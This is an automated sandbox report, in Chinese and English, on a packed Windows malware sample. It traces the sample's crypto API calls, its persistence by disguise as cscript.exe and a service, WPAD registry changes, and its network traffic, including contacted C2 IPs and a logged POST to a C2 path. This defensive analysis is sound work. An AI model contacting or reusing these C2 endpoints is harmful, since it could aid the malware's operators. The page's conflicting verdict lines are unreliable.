8.0
高危
该样本未表现出任何异常!
重新分析
更多

53d0aa39cee8ced2dd089a89df7c919ec0b809a1f091bff88396777033d19f3b

3ea71bb177d130104b58d89e8fb340e5.exe

分析耗时

107s

最近分析

文件大小

540.1KB
静态报毒 动态报毒
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
未检测 暂无反病毒引擎检测结果
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619393838.882626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 个事件)
Time & API Arguments Status Return Repeated
1619393825.475626
CryptGenKey
crypto_handle: 0x002f4d28
algorithm_identifier: 0x0000660e ()
provider_handle: 0x002f4250
flags: 1
key: f8N»¥½_bžEÎ9ö°º
success 1 0
1619393838.882626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤hô¦šŠÞG~÷{¢už•ŸG‹²çü²ìé’৐‰55ÍÐ=¾íUMsØÂ|2:i‰ ¸ Å}…$2ÅyÑó›3"´ã)¶›Ð5{ਜ਼VDë•Ç‘:¥yµ…¨H•Ýw¨MŽ
blob_type: 1
flags: 64
success 1 0
1619393866.241626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤í.òžÃ}zŸ×G¡ÏÊwµEÓ–*©L‘8VOd-GLö¸€áÚÜ ™F4F.ŸÏEh+céYò±ÄôÇ·.(›133¥*™}êé§Åç!û8‚lÂ1J 
blob_type: 1
flags: 64
success 1 0
1619393870.382626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤ ْñ¤ƒ¬Âg¥Knë›Óù¬Ú¬ämÐÛ¦ÑþßÄgùP×.ÛêYÕ_Fšÿ祖E2×ò|Åsf\DN† J=F¯j}¶06£;¨ R³n(üè.¶ÒçA°6J
blob_type: 1
flags: 64
success 1 0
1619393873.663626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤d~zQ:œOÞš´í¿×u@¤‘\q OZ ÓØÂ`âx!÷#&¹·L.TŸýxV{ØÚ´˜R‰R#º\ݦN¾›Zî/Çóì7¦$” ›ÂÛ¨Œ—: JžYS
blob_type: 1
flags: 64
success 1 0
1619393894.913626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤ €°°'ÃPT¡3Ru/Ñ/Q„ÔéðÉlŒëƒPSÃít±§#%5åø¹H0Hè1åëìlêK%[D«}fî$'CbuŠØ¶e.æéÆn/ÒD3Ír
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619393817.350876
NtAllocateVirtualMemory
process_identifier: 1056
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00520000
success 0 0
1619393449.43277
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00000000040c0000
success 0 0
1619393825.147626
NtAllocateVirtualMemory
process_identifier: 152
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e30000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619393818.491876
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ea71bb177d130104b58d89e8fb340e5.exe
newfilepath: C:\Windows\SysWOW64\wmp\cscript.exe
newfilepath_r: C:\Windows\SysWOW64\wmp\cscript.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ea71bb177d130104b58d89e8fb340e5.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619393839.507626
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process cscript.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619393839.163626
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 105.209.235.113
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Installs itself for autorun at Windows startup (1 个事件)
service_name cscript service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\wmp\cscript.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619393823.897876
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02e43ef0
display_name: cscript
error_control: 0
service_name: cscript
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\wmp\cscript.exe"
filepath_r: "C:\Windows\SysWOW64\wmp\cscript.exe"
service_manager_handle: 0x02e5fcf0
desired_access: 2
service_type: 16
password:
success 48512752 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: P½Ci :×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619393842.085626
RegSetValueExW
key_handle: 0x00000390
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: P½Ci :×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619393842.100626
RegSetValueExW
key_handle: 0x0000038c
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\wmp\cscript.exe:Zone.Identifier
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 24.26.151.3:80
dead_host 172.217.160.110:443
dead_host 162.144.42.60:8080
dead_host 172.217.24.14:443
dead_host 192.168.56.101:49196
dead_host 68.183.233.80:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-28 00:19:03

Imports

Library MFC42.DLL:
0x419090
0x419094
0x419098
0x41909c
0x4190a0
0x4190a4
0x4190a8
0x4190ac
0x4190b0
0x4190b4
0x4190b8
0x4190bc
0x4190c0
0x4190c4
0x4190c8
0x4190cc
0x4190d0
0x4190d4
0x4190d8
0x4190dc
0x4190e0
0x4190e4
0x4190e8
0x4190ec
0x4190f0
0x4190f4
0x4190f8
0x4190fc
0x419100
0x419104
0x419108
0x41910c
0x419110
0x419114
0x419118
0x41911c
0x419120
0x419124
0x419128
0x41912c
0x419130
0x419134
0x419138
0x41913c
0x419140
0x419144
0x419148
0x41914c
0x419150
0x419154
0x419158
0x41915c
0x419160
0x419164
0x419168
0x41916c
0x419170
0x419174
0x419178
0x41917c
0x419180
0x419184
0x419188
0x41918c
0x419190
0x419194
0x419198
0x41919c
0x4191a0
0x4191a4
0x4191a8
0x4191ac
0x4191b0
0x4191b4
0x4191b8
0x4191bc
0x4191c0
0x4191c4
0x4191c8
0x4191cc
0x4191d0
0x4191d4
0x4191d8
0x4191dc
0x4191e0
0x4191e4
0x4191e8
0x4191ec
0x4191f0
0x4191f4
0x4191f8
0x4191fc
0x419200
0x419204
0x419208
0x41920c
0x419210
0x419214
0x419218
0x41921c
0x419220
0x419224
0x419228
0x41922c
0x419230
0x419234
0x419238
0x41923c
0x419240
0x419244
0x419248
0x41924c
0x419250
0x419254
0x419258
0x41925c
0x419260
0x419264
0x419268
0x41926c
0x419270
0x419274
0x419278
0x41927c
0x419280
0x419284
0x419288
0x41928c
0x419290
0x419294
0x419298
0x41929c
0x4192a0
0x4192a4
0x4192a8
0x4192ac
0x4192b0
0x4192b4
0x4192b8
0x4192bc
0x4192c0
0x4192c4
0x4192c8
0x4192cc
0x4192d0
Library MSVCRT.dll:
0x4192ec _except_handler3
0x4192f0 _setmbcp
0x4192f4 __CxxFrameHandler
0x4192f8 _EH_prolog
0x4192fc memset
0x419300 strlen
0x419304 _ftol
0x419308 _mbsnbcpy
0x41930c _wcslwr
0x419310 malloc
0x419314 _mbsstr
0x419318 __dllonexit
0x41931c _onexit
0x419320 _exit
0x419324 _XcptFilter
0x419328 exit
0x41932c _acmdln
0x419330 __getmainargs
0x419334 _initterm
0x419338 __setusermatherr
0x41933c _adjust_fdiv
0x419340 __p__commode
0x419344 __p__fmode
0x419348 __set_app_type
0x41934c _controlfp
Library KERNEL32.dll:
0x419058 GetStartupInfoA
0x41905c GetModuleHandleA
0x419060 ExitProcess
0x419064 GetLastError
0x419068 VirtualAlloc
0x41906c FreeLibrary
0x419070 LoadLibraryA
0x419078 lstrcpyA
0x41907c WinExec
0x419080 lstrlenA
0x419084 GetProcAddress
0x419088 lstrcatA
Library USER32.dll:
0x419360 LoadIconA
0x419364 InSendMessage
0x419368 CreateWindowExA
0x41936c ShowWindow
0x419370 KillTimer
0x419374 SetWindowLongA
0x419378 GetIconInfo
0x41937c SetTimer
0x419380 PtInRect
0x419384 ScreenToClient
0x419388 GetMessagePos
0x41938c IsWindow
0x419390 CopyIcon
0x419394 LoadCursorA
0x419398 GetDC
0x41939c CreateIconIndirect
0x4193a0 EnableWindow
0x4193a4 FillRect
0x4193a8 DrawStateA
0x4193ac GetClientRect
0x4193b0 CopyRect
0x4193b4 FrameRect
0x4193b8 InflateRect
0x4193bc GetSysColor
0x4193c0 OffsetRect
0x4193c4 DrawFocusRect
0x4193c8 GetWindowRect
0x4193cc GetSubMenu
0x4193d0 TrackPopupMenuEx
0x4193d4 PostMessageA
0x4193d8 ClientToScreen
0x4193dc WindowFromPoint
0x4193e0 GetActiveWindow
0x4193e4 InvalidateRect
0x4193e8 LoadMenuA
0x4193ec ReleaseDC
0x4193f0 LoadImageA
0x4193f4 SetCursor
0x4193f8 GetParent
0x4193fc GetNextDlgTabItem
0x419400 SendMessageA
0x419404 GetWindowLongA
0x419408 DestroyIcon
0x41940c DestroyCursor
0x419410 DestroyMenu
0x419414 MessageBeep
Library GDI32.dll:
0x41901c CreateFontIndirectA
0x419020 GetObjectA
0x419024 GetPixel
0x419028 SetPixel
0x41902c CreateBitmap
0x419030 DeleteObject
0x419034 GetStockObject
0x419038 SelectObject
0x419040 CreateCompatibleDC
0x419044 BitBlt
0x419048 DeleteDC
0x41904c SetTextColor
0x419050 SetBkColor
Library ADVAPI32.dll:
0x419000 RegQueryValueA
0x419004 RegOpenKeyExA
0x419008 RegCloseKey
Library SHELL32.dll:
0x419354 ShellExecuteExA
0x419358 ShellExecuteA
Library COMCTL32.dll:
0x419010 _TrackMouseEvent
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49197 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 62191 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 54178 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/yf0k5fYCBGk2Awm/3HPB/2foiQx/lZGKO3FVHw7KLNr5/aOmO178HBGzK6hVrl/uAcohFS9o/ 
POST /yf0k5fYCBGk2Awm/3HPB/2foiQx/lZGKO3FVHw7KLNr5/aOmO178HBGzK6hVrl/uAcohFS9o/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------3f1c9b893da4a13120970093476d3c77
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.